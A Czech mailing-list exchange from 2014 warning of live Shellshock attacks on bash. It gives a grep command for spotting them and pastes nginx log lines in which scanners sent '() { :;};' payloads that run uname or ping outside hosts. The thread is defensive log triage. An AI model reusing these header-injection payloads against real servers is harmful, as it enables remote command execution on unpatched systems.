[vpsFree.cz: community-list] Útoky na bash běží

[Jiří Medvěd]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Ahoj Petre,
diky.

Nasel jsou zatim pouze toto :)

/var/log/nginx/access.log:54.251.83.67 - - [29/Sep/2014:07:26:24
+0200] "GET / HTTP/1.1" 200 612 "-" "() { :;}; /bin/bash -c \x22echo
testing9123123\x22; /bin/uname -a"
/var/log/nginx/access.log-20140925.gz:209.126.230.72 - -
[24/Sep/2014:23:47:52 +0200] "GET / HTTP/1.0" 200 612 "() { :; }; ping
- -c 11 216.75.60.74" "shellshock-scan
(http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
/var/log/nginx/access.log-20140926.gz:209.126.230.72 - -
[25/Sep/2014:03:52:42 +0200] "GET / HTTP/1.0" 200 612 "() { :; }; ping
- -c 11 209.126.230.74" "shellshock-scan
(http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
/var/log/nginx/access.log-20140926.gz:89.207.135.125 - -
[25/Sep/2014:14:38:39 +0200] "GET /cgi-sys/defaultwebpage.cgi
HTTP/1.0" 404 162 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
/var/log/nginx/access.log-20140926.gz:198.20.69.74 - -
[26/Sep/2014:01:47:24 +0200] "GET / HTTP/1.1" 200 612 "() { :; };
/bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"

Dne 29.9.2014 v 09:41 Petr Krcmar napsal(a):
> Ahoj, jen bych chtěl varovat, že útoky na bash jsou v plném
> proudu, podle logu se mi včera někdo snažil do serveru nahrát
> rootkit a pustit ho. Takže buďte ostražití a záplatujte si to.
> 
> Pokud chcete vidět ty věci z logu, pak si grepněte:
> 
> # grep '() {' /var/log/nginx/*
> 
> Pokud máte logrotate a zagzipované logy, tak použijte zgrep.
> 
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iF4EAREIAAYFAlQpEEkACgkQ5JdzTS3AJTbe4QEAhKZrmMvrkOH4gQZDk5TNbJ5+
zGVw+Zxp5lhx1Y8mBtkBAJBBjVlGvdLEQhFF5RDF3O4aAAgjeN1IOqfNXrBNzB45
=BEHd
-----END PGP SIGNATURE-----